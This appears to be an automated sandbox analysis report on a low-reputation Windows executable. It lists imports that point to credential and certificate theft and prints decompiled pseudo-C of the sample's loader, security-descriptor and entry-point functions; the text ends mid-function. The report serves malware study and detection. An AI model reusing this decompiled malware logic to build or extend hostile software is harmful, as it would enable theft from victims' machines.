SHLWAPI.dll	PathIsURLW, PathRemoveBackslashW, StrCmpNIW, wvnsprintfA, StrCmpNIA, PathMatchSpecW, PathUnquoteSpacesW, PathAddExtensionW, PathCombineW, SHDeleteKeyW, PathSkipRootW, SHDeleteValueW, PathAddBackslashW, PathFindFileNameW, PathIsDirectoryW, wvnsprintfW, UrlUnescapeA, StrStrIW, StrStrIA, PathRemoveFileSpecW, PathQuoteSpacesW, PathRenameExtensionW
SHELL32.dll	CommandLineToArgvW, SHGetFolderPathW, ShellExecuteW
Secur32.dll	GetUserNameExW
ole32.dll	StringFromGUID2, CLSIDFromString, CoUninitialize, CoCreateInstance, CoInitializeEx
GDI32.dll	CreateCompatibleBitmap, GetDIBits, CreateDIBSection, SetViewportOrgEx, DeleteDC, GdiFlush, DeleteObject, SelectObject, SetRectRgn, CreateCompatibleDC, GetDeviceCaps, RestoreDC, SaveDC
WS2_32.dll	getaddrinfo, recvfrom, getpeername, send, closesocket, WSASend, WSAGetLastError, accept, WSAEventSelect, WSAIoctl, connect, WSAAddressToStringW, WSAStartup, shutdown, setsockopt, bind, socket, WSASetLastError, select, getsockname, sendto, recv, freeaddrinfo, listen
CRYPT32.dll	PFXExportCertStoreEx, CertDuplicateCertificateContext, CertEnumCertificatesInStore, PFXImportCertStore, CertCloseStore, CertOpenSystemStoreW, CertDeleteCertificateFromStore, CryptUnprotectData
WININET.dll	HttpAddRequestHeadersW, InternetSetStatusCallbackW, GetUrlCacheEntryInfoW, HttpSendRequestW, InternetReadFileExA, InternetQueryDataAvailable, HttpSendRequestExW, HttpSendRequestExA, HttpAddRequestHeadersA, InternetQueryOptionA, InternetOpenA, HttpSendRequestA, HttpOpenRequestA, InternetSetOptionA, InternetReadFile, InternetCrackUrlA, InternetQueryOptionW, InternetConnectA, HttpQueryInfoA, InternetCloseHandle
OLEAUT32.dll	VariantInit, SysAllocString, VariantClear, SysFreeString
NETAPI32.dll	NetApiBufferFree, NetUserEnum, NetUserGetInfo

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

System Behavior

Analysis Process: MjjnJ90i5q.exe PID: 6584 Parent PID: 5716

General

Start time:	16:36:28
Start date:	28/02/2021
Path:	C:\Users\user\Desktop\MjjnJ90i5q.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\MjjnJ90i5q.exe'
Imagebase:	0x400000
File size:	141824 bytes
MD5 hash:	6C7E2255031FDBB8EFD157C2B4179319
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: MjjnJ90i5q.exe PID: 6584 Parent PID: 5716 MjjnJ90i5q.exeCOMMON

Executed Functions

Function 00405EFF, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 229
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00405EFF(signed int** __ecx, void* __edx, signed char _a4) {
				char _v522;
				char _v972;
				char _v1364;
				char _v1384;
				intOrPtr _v1392;
				intOrPtr _v1396;
				signed int _v1400;
				intOrPtr _v1404;
				signed int** _v1408;
				struct HINSTANCE__* _v1412;
				void* __edi;
				void* __esi;
				signed int _t40;
				struct HINSTANCE__* _t43;
				struct HINSTANCE__* _t47;
				_Unknown_base(*)()* _t53;
				void* _t54;
				signed int _t57;
				void** _t58;
				void** _t60;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				void* _t73;
				intOrPtr _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;
				struct HINSTANCE__* _t81;
				int _t83;
				signed int _t86;
				void* _t89;
				signed int* _t91;
				signed int _t95;
				WCHAR* _t97;
				void* _t98;
				signed int* _t100;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;

				_t89 = __edx;
				_t87 = __ecx;
				_t95 = _a4 & 0x00000001;
				_v1400 = _t95;
				if(_t95 != 0) {
					_t83 = 0;
					__eflags = 0;
				} else {
					_t83 = 0;
					 *0x422530 = 0;
				}
				_t91 = E00405BBA();
				 *0x422548 = _t91;
				if(_t91 == _t83) {
					L27:
					_t40 = 0;
				} else {
					if(_t95 != _t83) {
						_v1400 = E00405AF4(_t87, _t89, _t91, "GetProcAddress");
						_v1400 = E00405AF4(_t87, _t89, _t91, "LoadLibraryA");
						_t43 =  *0x422544; // 0x400000
						_t5 = _t43 + 0x3c; // 0xd8
						_v1412 = _t43;
						_t87 =  *_t5 + _t43 + 0x80;
						__eflags = _v1400 - _t83;
						if(_v1400 == _t83) {
							goto L21;
						} else {
							__eflags = _v1396 - _t83;
							if(_v1396 == _t83) {
								goto L21;
							} else {
								_t91 =  *_t87;
								__eflags = _t91 - _t83;
								if(_t91 <= _t83) {
									goto L21;
								} else {
									__eflags = _t87[1] - 0x14;
									if(_t87[1] <= 0x14) {
										goto L21;
									} else {
										_t91 = _t91 + _t43;
										__eflags =  *_t91 - _t83;
										if( *_t91 == _t83) {
											goto L21;
										} else {
											while(1) {
												_t77 = _v1392(_t91[3] + _v1404);
												_v1392 = _t77;
												__eflags = _t77 - _t83;
												if(_t77 == _t83) {
													goto L27;
												}
												_t100 = _v1408 +  *_t91;
												_t86 = _v1408 + _t91[4];
												while(1) {
													_t78 =  *_t100;
													__eflags = _t78;
													if(__eflags == 0) {
														break;
													}
													if(__eflags >= 0) {
														_t87 = _v1408;
														_t79 =  &(_v1408[0]) + _t78;
													} else {
														_t79 = _t78 & 0x0000ffff;
													}
													_t80 = _v1400(_v1392, _t79);
													__eflags = _t80;
													if(_t80 == 0) {
														goto L27;
													} else {
														 *_t86 = _t80;
														_t100 =  &(_t100[1]);
														_t86 = _t86 + 4;
														__eflags = _t86;
														continue;
													}
													goto L47;
												}
												_t91 =  &(_t91[5]);
												_t83 = 0;
												__eflags =  *_t91;
												if( *_t91 != 0) {
													continue;
												} else {
													goto L21;
												}
												goto L47;
											}
											goto L27;
										}
									}
								}
							}
						}
					} else {
						_t81 = GetModuleHandleW(_t83);
						 *0x422544 = _t81;
						if(_t81 == _t83) {
							goto L27;
						} else {
							L21:
							_t97 =  &_v1384;
							E00419DD3(0xe5, _t97);
							_t47 = GetModuleHandleW(_t97);
							 *0x42254c = _t47;
							if(_t47 == _t83) {
								goto L27;
							} else {
								_t98 = GetProcAddress;
								 *0x422550 = GetProcAddress(_t47, "NtCreateThread");
								 *0x422554 = GetProcAddress( *0x42254c, "NtCreateUserProcess");
								 *0x422558 = GetProcAddress( *0x42254c, "NtQueryInformationProcess");
								 *0x42255c = GetProcAddress( *0x42254c, "RtlUserThreadStart");
								 *0x422560 = GetProcAddress( *0x42254c, "LdrLoadDll");
								_t53 = GetProcAddress( *0x42254c, "LdrGetDllHandle");
								 *0x422564 = _t53;
								_t109 =  *0x422550 - _t83; // 0x77a299e0
								if(_t109 != 0) {
									L24:
									_t111 =  *0x422558 - _t83; // 0x77a29670
									if(_t111 == 0) {
										goto L27;
									} else {
										_t112 =  *0x422560 - _t83; // 0x779f7840
										if(_t112 == 0 || _t53 == _t83) {
											goto L27;
										} else {
											_t54 = HeapCreate(_t83, 0x80000, _t83); // executed
											 *0x423c58 = _t54;
											__eflags = _t54 - _t83;
											if(_t54 != _t83) {
												 *0x422423 = 1;
											} else {
												 *0x423c58 = GetProcessHeap();
												 *0x422423 = 0;
											}
											 *0x422e8c = _t83;
											 *0x422422 = 0;
											InitializeCriticalSection(0x422a30);
											 *0x422a48 = _t83; // executed
											__imp__#115(0x202,  &_v1364); // executed
											_t57 = E00405BF4(_a4, _t87, _t91, _t98);
											__eflags = _t57;
											if(_t57 == 0) {
												goto L27;
											} else {
												__eflags = _v1408 - _t83;
												if(_v1408 != _t83) {
													L34:
													_t58 = E00412FD8(_t87, 0xffffffff, 0x422540);
													 *0x422534 = _t58;
													__eflags = _t58 - _t83;
													if(_t58 == _t83) {
														goto L27;
													} else {
														 *0x422538 = GetLengthSid( *_t58);
														_t60 =  *0x422534; // 0x0
														 *0x42253c = E00412D70( *_t60, _t59);
														_t62 = E00405C73(_t61, _a4);
														__eflags = _t62;
														if(_t62 == 0) {
															goto L27;
														} else {
															 *0x4227a0 = GetCurrentProcessId();
															 *0x4227a4 = _t83;
															__eflags = _v1408 - _t83;
															if(_v1408 != _t83) {
																_t64 = 1;
															} else {
																_t64 = E00405CD5();
															}
															__eflags = _t64;
															if(_t64 == 0) {
																goto L27;
															} else {
																__eflags = _v1408 - _t83;
																if(_v1408 == _t83) {
																	E004065EC( &_v972);
																	_t87 = 0x42299e;
																	E0041601A(0x42299e, 0x4227a8,  *0x42253c,  &_v522, _t83);
																}
																_t65 = E00405D27(_a4);
																__eflags = _t65;
																if(_t65 == 0) {
																	goto L27;
																} else {
																	__eflags = _a4 & 0x00000002;
																	 *0x423c68 = _t83;
																	 *0x422a70 = 0;
																	 *0x4223c0 = 0;
																	 *0x423e10 = 0;
																	 *0x423d90 = 0;
																	 *0x423d10 = 0;
																	 *0x423ca8 = 0;
																	if(__eflags == 0) {
																		_t67 = 1;
																	} else {
																		_t67 = E00405DDE(_t87, _t89, __eflags);
																	}
																	__eflags = _t67;
																	_t38 = _t67 != 0;
																	__eflags = _t38;
																	_t40 = _t67 & 0xffffff00 | _t38;
																}
															}
														}
													}
												} else {
													_t73 = CreateEventW(0x422568, 1, _t83, _t83);
													 *0x4229f8 =  *0x4229f8 | 0xffffffff;
													 *0x4229f4 = _t73;
													__eflags = _t73 - _t83;
													if(_t73 == _t83) {
														goto L27;
													} else {
														goto L34;
													}
												}
											}
										}
									}
								} else {
									_t110 =  *0x422554 - _t83; // 0x77a2a120
									if(_t110 == 0) {
										goto L27;
									} else {
										goto L24;
									}
								}
							}
						}
					}
				}
				L47:
				return _t40;
			}

0x00405eff
0x00405eff
0x00405f10
0x00405f14
0x00405f18
0x00405f24
0x00405f24
0x00405f1a
0x00405f1a
0x00405f1c
0x00405f1c
0x00405f2b
0x00405f2d
0x00405f35
0x004060ba
0x004060ba
0x00405f3b
0x00405f3d
0x00405f67
0x00405f70
0x00405f74
0x00405f79
0x00405f7c
0x00405f80
0x00405f87
0x00405f8b
0x00000000
0x00405f8d
0x00405f8d
0x00405f91
0x00000000
0x00405f93
0x00405f93
0x00405f95
0x00405f97
0x00000000
0x00405f99
0x00405f99
0x00405f9d
0x00000000
0x00405f9f
0x00405f9f
0x00405fa1
0x00405fa3
0x00000000
0x00405fa5
0x00405fa5
0x00405fad
0x00405fb1
0x00405fb5
0x00405fb7
0x00000000
0x00000000
0x00405fc2
0x00405fc6
0x00405ff6
0x00405ff6
0x00405ff8
0x00405ffa
0x00000000
0x00000000
0x00405fcc
0x00405fd5
0x00405fd9
0x00405fce
0x00405fce
0x00405fce
0x00405fe2
0x00405fe6
0x00405fe8
0x00000000
0x00405fee
0x00405fee
0x00405ff0
0x00405ff3
0x00405ff3
0x00000000
0x00405ff3
0x00000000
0x00405fe8
0x00405ffc
0x00405fff
0x00406001
0x00406003
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406003
0x00000000
0x00405fa5
0x00405fa3
0x00405f9d
0x00405f97
0x00405f91
0x00405f3f
0x00405f40
0x00405f46
0x00405f4d
0x00000000
0x00405f53
0x00406005
0x00406005
0x0040600e
0x00406016
0x0040601c
0x00406023
0x00000000
0x00406029
0x00406029
0x00406042
0x00406054
0x00406066
0x00406078
0x0040608a
0x0040608f
0x00406091
0x00406096
0x0040609c
0x004060a6
0x004060a6
0x004060ac
0x00000000
0x004060ae
0x004060ae
0x004060b4
0x00000000
0x004060c1
0x004060c8
0x004060ce
0x004060d3
0x004060d5
0x004060eb
0x004060d7
0x004060dd
0x004060e2
0x004060e2
0x004060f7
0x004060fd
0x00406104
0x00406114
0x0040611a
0x00406123
0x00406128
0x0040612a
0x00000000
0x0040612c
0x0040612c
0x00406130
0x00406155
0x0040615c
0x00406161
0x00406166
0x00406168
0x00000000
0x0040616e
0x00406176
0x0040617c
0x0040618b
0x00406190
0x00406195
0x00406197
0x00000000
0x0040619d
0x004061a3
0x004061a8
0x004061ae
0x004061b2
0x004061bb
0x004061b4
0x004061b4
0x004061b4
0x004061bd
0x004061bf
0x00000000
0x004061c5
0x004061c5
0x004061c9
0x004061d2
0x004061e6
0x004061f5
0x004061f5
0x004061fd
0x00406202
0x00406204
0x00000000
0x0040620a
0x0040620c
0x00406210
0x00406216
0x0040621c
0x00406222
0x00406228
0x0040622e
0x00406234
0x0040623a
0x00406243
0x0040623c
0x0040623c
0x0040623c
0x00406245
0x00406247
0x00406247
0x00406247
0x00406247
0x00406204
0x004061bf
0x00406197
0x00406132
0x0040613b
0x00406141
0x00406148
0x0040614d
0x0040614f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040614f
0x00406130
0x0040612a
0x004060b4
0x0040609e
0x0040609e
0x004060a4
0x00000000
0x00000000
0x00000000
0x00000000
0x004060a4
0x0040609c
0x00406023
0x00405f4d
0x00405f3d
0x0040624a
0x00406250

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 00405F40
GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 00406016
GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 00406035
GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 00406047
GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 00406059
GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 0040606B
GetProcAddress.KERNEL32(LdrLoadDll), ref: 0040607D
GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 0040608F
HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 004060C8
GetProcessHeap.KERNEL32(?,?,00000000), ref: 004060D7
InitializeCriticalSection.KERNEL32(00422A30,?,?,00000000), ref: 00406104
WSAStartup.WS2_32(00000202,?), ref: 0040611A
CreateEventW.KERNEL32(00422568,00000001,00000000,00000000,?,?,00000000), ref: 0040613B
GetLengthSid.ADVAPI32(00000000,000000FF,00422540,?,?,00000000), ref: 00406170
GetCurrentProcessId.KERNEL32(00000000,00000000,00000000,?,?,00000000), ref: 0040619D

Strings

NtCreateThread, xrefs: 0040602F
LdrLoadDll, xrefs: 0040606D
NtQueryInformationProcess, xrefs: 00406049
LoadLibraryA, xrefs: 00405F62
GetProcAddress, xrefs: 00405F58
LdrGetDllHandle, xrefs: 0040607F
NtCreateUserProcess, xrefs: 00406037
RtlUserThreadStart, xrefs: 0040605B

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$CreateHandleHeapModuleProcess$CriticalCurrentEventInitializeLengthSectionStartup
String ID: GetProcAddress$LdrGetDllHandle$LdrLoadDll$LoadLibraryA$NtCreateThread$NtCreateUserProcess$NtQueryInformationProcess$RtlUserThreadStart
API String ID: 3091071419-305303173
Opcode ID: 9ab8c5f03515526c1c65749a3a8782ff169973579631a05e7255d9ddbe00d3ce
Instruction ID: 72842e49fc3667fb30e083800423b24795e52e75ec42b08aad1e89e6e6d83850
Opcode Fuzzy Hash: 9ab8c5f03515526c1c65749a3a8782ff169973579631a05e7255d9ddbe00d3ce
Instruction Fuzzy Hash: E0919071640342BFCB20EF65EE8461A7BA4FB04309B51443FE446B72A1D7B88996CF5E

Uniqueness

Uniqueness Score: -1.00%

Function 00414FB0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00414FB0(struct _SECURITY_DESCRIPTOR* __edi, intOrPtr* __esi) {
				signed int _v8;
				struct _ACL* _v12;
				int _v16;
				int _v20;
				void** _t19;
				struct _SECURITY_DESCRIPTOR* _t28;
				intOrPtr* _t29;

				_t29 = __esi;
				_t28 = __edi;
				if(InitializeSecurityDescriptor(__edi, 1) == 0 || SetSecurityDescriptorDacl(__edi, 1, 0, 0) == 0) {
					return 0;
				} else {
					_t19 =  &_v8;
					__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;;NRNWNX;;;LW)", 1, _t19, 0); // executed
					if(_t19 == 0) {
						L6:
						_v8 = _v8 | 0xffffffff;
						L7:
						if(_t29 != 0) {
							 *_t29 = 0xc;
							 *(_t29 + 4) = _t28;
							 *((intOrPtr*)(_t29 + 8)) = 0;
						}
						return _v8;
					}
					_v12 = 0;
					if(GetSecurityDescriptorSacl(_v8,  &_v20,  &_v12,  &_v16) == 0 || SetSecurityDescriptorSacl(__edi, _v20, _v12, _v16) == 0) {
						LocalFree(_v8);
						goto L6;
					} else {
						goto L7;
					}
				}
			}

0x00414fb0
0x00414fb0
0x00414fc2
0x00000000
0x00414fd5
0x00414fd6
0x00414fe1
0x00414fe9
0x00415024
0x00415024
0x00415028
0x0041502a
0x0041502c
0x00415032
0x00415035
0x00415035
0x00000000
0x00415038
0x00414ffa
0x00415005
0x0041501e
0x00000000
0x00000000
0x00000000
0x00000000
0x00415005

APIs

InitializeSecurityDescriptor.ADVAPI32(00422574,00000001,00000000,00406128,?,?,00000000), ref: 00414FBA
SetSecurityDescriptorDacl.ADVAPI32(00422574,00000001,00000000,00000000,?,?,00000000), ref: 00414FCB
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 00414FE1
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?,?,?,00000000), ref: 00414FFD
SetSecurityDescriptorSacl.ADVAPI32(00422574,?,?,?,?,?,00000000), ref: 00415011
LocalFree.KERNEL32(00000000,?,?,00000000), ref: 0041501E

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 00414FDC

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorSecurity$Sacl$ConvertDaclFreeInitializeLocalString
String ID: S:(ML;;NRNWNX;;;LW)
API String ID: 2050860296-820036962
Opcode ID: 4ba46da086e5b333583ac26969431c6ab3c47b464b3cd1d8861d5bd78347aa53
Instruction ID: 3c6fd052f6bd8593f09a9288accafee790c45220e45dfd6fd4f379285c8a9b4e
Opcode Fuzzy Hash: 4ba46da086e5b333583ac26969431c6ab3c47b464b3cd1d8861d5bd78347aa53
Instruction Fuzzy Hash: 50114F71900609FFEB219FE08E84AEFBBBCAB48740F10446AF551F11A0D7758A849B54

Uniqueness

Uniqueness Score: -1.00%

Function 00406E89, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(signed int __ecx, void* __edx, void* __eflags) {
				char _v5;
				int _v12;
				char _v16;
				char _v20;
				void* _t22;
				void* _t28;
				char _t29;
				char _t33;
				signed int _t36;

				_t34 = __ecx;
				_t33 = 0; // executed
				_t22 = E00405EFF(__ecx, __edx, 0); // executed
				if(_t22 == 0) {
					L24:
					__eflags = _t33;
					_t21 = _t33 == 0;
					__eflags = _t21;
					ExitProcess(0 | _t21);
				}
				_v20 = 0;
				_v16 = 1;
				_v5 = 0;
				SetErrorMode(0x8007);
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v12);
				if(_t28 == 0) {
					L19:
					_t29 = E00406B42(_t34, __eflags, _v20, _v16);
					L20:
					_t33 = _t29;
					L21:
					if(_t33 == 0 || ( *0x422530 & 0x00000002) == 0) {
						goto L24;
					} else {
						Sleep(0xffffffff);
						return _t29;
					}
				}
				_t36 = 0;
				if(_v12 <= 0) {
					L14:
					LocalFree(_t28);
					_t48 = _t33;
					if(_t33 == 0) {
						__eflags = _v5;
						if(__eflags == 0) {
							goto L19;
						}
						E0041AB48(_t36);
						_t29 = E0040C3B1();
						__eflags =  *0x422530 & 0x00000004;
						_t33 = _t29;
						if(( *0x422530 & 0x00000004) != 0) {
							_t29 = E0041A9C1(0x423e78, 0);
						}
						goto L21;
					}
					_t29 = E00406954(_t48);
					goto L20;
				} else {
					goto L3;
				}
				do {
					L3:
					_t34 =  *(_t28 + _t36 * 4);
					if(_t34 != 0 &&  *_t34 == 0x2d) {
						_t34 =  *(_t34 + 2) & 0x0000ffff;
						if(_t34 == 0x66) {
							_v20 = 1;
						} else {
							if(_t34 == 0x69) {
								_t33 = 1;
							} else {
								if(_t34 == 0x6e) {
									_v16 = 0;
								} else {
									if(_t34 == 0x76) {
										_v5 = 1;
									}
								}
							}
						}
					}
					_t36 = _t36 + 1;
				} while (_t36 < _v12);
				goto L14;
			}

0x00406e89
0x00406e92
0x00406e94
0x00406e9b
0x00406f75
0x00406f77
0x00406f79
0x00406f79
0x00406f7d
0x00406f7d
0x00406ea6
0x00406ea9
0x00406ead
0x00406eb0
0x00406ec1
0x00406ec9
0x00406f50
0x00406f56
0x00406f5b
0x00406f5b
0x00406f5d
0x00406f5f
0x00000000
0x00406f6a
0x00406f6c
0x00406f74
0x00406f74
0x00406f5f
0x00406ecf
0x00406ed4
0x00406f15
0x00406f16
0x00406f1c
0x00406f1e
0x00406f27
0x00406f2b
0x00000000
0x00000000
0x00406f2d
0x00406f32
0x00406f37
0x00406f3e
0x00406f40
0x00406f49
0x00406f49
0x00000000
0x00406f40
0x00406f20
0x00000000
0x00000000
0x00000000
0x00000000
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edb
0x00406ee3
0x00406eea
0x00406f0b
0x00406eec
0x00406eef
0x00406f07
0x00406ef1
0x00406ef4
0x00406f01
0x00406ef6
0x00406ef9
0x00406efb
0x00406efb
0x00406ef9
0x00406ef4
0x00406eef
0x00406eea
0x00406f0f
0x00406f10
0x00000000

APIs

Part of subcall function 00405EFF: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 00405F40
Part of subcall function 00405EFF: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 00406016
Part of subcall function 00405EFF: GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 00406035
Part of subcall function 00405EFF: GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 00406047
Part of subcall function 00405EFF: GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 00406059
Part of subcall function 00405EFF: GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 0040606B
Part of subcall function 00405EFF: GetProcAddress.KERNEL32(LdrLoadDll), ref: 0040607D
Part of subcall function 00405EFF: GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 0040608F

SetErrorMode.KERNEL32(00008007,00000000), ref: 00406EB0
GetCommandLineW.KERNEL32(?), ref: 00406EBA
CommandLineToArgvW.SHELL32(00000000), ref: 00406EC1
LocalFree.KERNEL32(00000000), ref: 00406F16
Sleep.KERNEL32(000000FF,?,00000001), ref: 00406F6C
ExitProcess.KERNEL32 ref: 00406F7D

Strings

x>B, xrefs: 00406F44

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$CommandHandleLineModule$ArgvErrorExitFreeLocalModeProcessSleep
String ID: x>B
API String ID: 1184560534-2092227387
Opcode ID: 3b39ccae79459fe9462b7ae4b7f449ee0f08039604567dd5c304a10e441a3a3a
Instruction ID: 984bf75f5068c7dd1c484d0075aed456edeaacdbc13feb2093e863f46ac6093e
Opcode Fuzzy Hash: 3b39ccae79459fe9462b7ae4b7f449ee0f08039604567dd5c304a10e441a3a3a
Instruction Fuzzy Hash: 6C214E3094924765DF2077B4A9197BE3BA55F02304F1940BFEA43B62D1CB7D4969870E

Uniqueness

Uniqueness Score: -1.00%

Function 00415F64, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00415F64() {
				void* _t30;
				void* _t33;
				intOrPtr* _t35;
				void* _t36;
				void* _t39;
				void* _t41;

				_t39 = _t41 - 0x74;
				_t17 = _t39 - 0x260;
				 *((char*)(_t39 + 0x73)) = 0;
				__imp__SHGetFolderPathW(0, 0x24, 0, 0, _t17, _t33, _t36, _t30); // executed
				if(_t17 != 0) {
					L8:
					E00411A74(_t17,  *((intOrPtr*)(_t39 + 0x7c)), 0, 0x10);
				} else {
					PathAddBackslashW(_t39 - 0x260);
					_t35 = __imp__GetVolumeNameForVolumeMountPointW;
					while(1) {
						_t17 =  *_t35(_t39 - 0x260, _t39 - 0x58, 0x64); // executed
						if(_t17 != 0) {
							break;
						}
						PathRemoveBackslashW(_t39 - 0x260);
						if(PathRemoveFileSpecW(_t39 - 0x260) == 0) {
							goto L8;
						} else {
							PathAddBackslashW(_t39 - 0x260);
							continue;
						}
						goto L9;
					}
					if( *((short*)(_t39 - 0x44)) != 0x7b) {
						goto L8;
					} else {
						 *((short*)(_t39 + 8)) = 0;
						_t17 = _t39 - 0x44;
						__imp__CLSIDFromString(_t17,  *((intOrPtr*)(_t39 + 0x7c)));
						if(_t17 != 0) {
							goto L8;
						} else {
							 *((char*)(_t39 + 0x73)) = 1;
						}
					}
				}
				L9:
				return  *((intOrPtr*)(_t39 + 0x73));
			}

0x00415f65
0x00415f74
0x00415f80
0x00415f83
0x00415f8b
0x00416002
0x00416008
0x00415f8d
0x00415f9a
0x00415f9c
0x00415fcb
0x00415fd8
0x00415fdc
0x00000000
0x00000000
0x00415fab
0x00415fc0
0x00000000
0x00415fc2
0x00415fc9
0x00000000
0x00415fc9
0x00000000
0x00415fc0
0x00415fe3
0x00000000
0x00415fe5
0x00415fea
0x00415fee
0x00415ff2
0x00415ffa
0x00000000
0x00415ffc
0x00415ffc
0x00415ffc
0x00415ffa
0x00415fe3
0x0041600d
0x00416017

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,00000000,75144EE0,00000000), ref: 00415F83
PathAddBackslashW.SHLWAPI(?), ref: 00415F9A
PathRemoveBackslashW.SHLWAPI(?), ref: 00415FAB
PathRemoveFileSpecW.SHLWAPI(?), ref: 00415FB8
PathAddBackslashW.SHLWAPI(?), ref: 00415FC9
GetVolumeNameForVolumeMountPointW.KERNELBASE(?,?,00000064), ref: 00415FD8
CLSIDFromString.OLE32(?,?), ref: 00415FF2

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$Backslash$RemoveVolume$FileFolderFromMountNamePointSpecString
String ID:
API String ID: 613918483-0
Opcode ID: 5634f72f302c6f28179f12b1d3e664314895bb2bd24a3c1b8eef413f4e4023af
Instruction ID: 5ac05843595b79cf8aa99d0773d9710e68670594775d1acf9cf294d696bbe35f
Opcode Fuzzy Hash: 5634f72f302c6f28179f12b1d3e664314895bb2bd24a3c1b8eef413f4e4023af
Instruction Fuzzy Hash: 7211727150410CAADF20DBB0DD88EDF7BBCAF08384F144466F514E3160D235DE899B64

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0041A1A9, Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 389
libraryloaderwindowCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E0041A1A9(WCHAR* _a4, char _a8, signed short _a12) {
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _v16;
				struct HINSTANCE__* _v20;
				_Unknown_base(*)()* _v24;
				void* _v28;
				void* _v32;
				struct HDC__* _v36;
				_Unknown_base(*)()* _v40;
				_Unknown_base(*)()* _v44;
				struct tagPOINT _v52;
				_Unknown_base(*)()* _v56;
				struct HINSTANCE__* _v60;
				_Unknown_base(*)()* _v64;
				_Unknown_base(*)()* _v68;
				_Unknown_base(*)()* _v72;
				_Unknown_base(*)()* _v76;
				_Unknown_base(*)()* _v80;
				_Unknown_base(*)()* _v84;
				_Unknown_base(*)()* _v88;
				struct HINSTANCE__* _v92;
				struct HINSTANCE__* _v96;
				struct HINSTANCE__* _v100;
				char _v104;
				_Unknown_base(*)()* _v108;
				intOrPtr _v112;
				char _v116;
				_Unknown_base(*)()* _v120;
				char _v148;
				signed int _v152;
				struct _ICONINFO _v172;
				char _v188;
				struct HINSTANCE__* _t169;
				_Unknown_base(*)()* _t176;
				struct HINSTANCE__* _t181;
				_Unknown_base(*)()* _t182;
				struct HINSTANCE__* _t183;
				_Unknown_base(*)()* _t191;
				struct HDC__* _t197;
				struct HICON__* _t199;
				signed int _t200;
				intOrPtr _t202;
				intOrPtr _t204;
				void* _t206;
				void* _t223;
				intOrPtr* _t224;
				void* _t239;
				void* _t248;
				unsigned int _t260;
				intOrPtr* _t262;
				signed short _t263;
				intOrPtr _t264;
				WCHAR** _t265;
				intOrPtr _t268;
				signed int _t269;
				signed int _t272;
				void* _t275;

				_v32 = 0;
				_v60 = 0;
				_v16 = 0;
				_v104 = 1;
				_v100 = 0;
				_v96 = 0;
				_v92 = 0;
				_t169 = LoadLibraryA("gdiplus.dll");
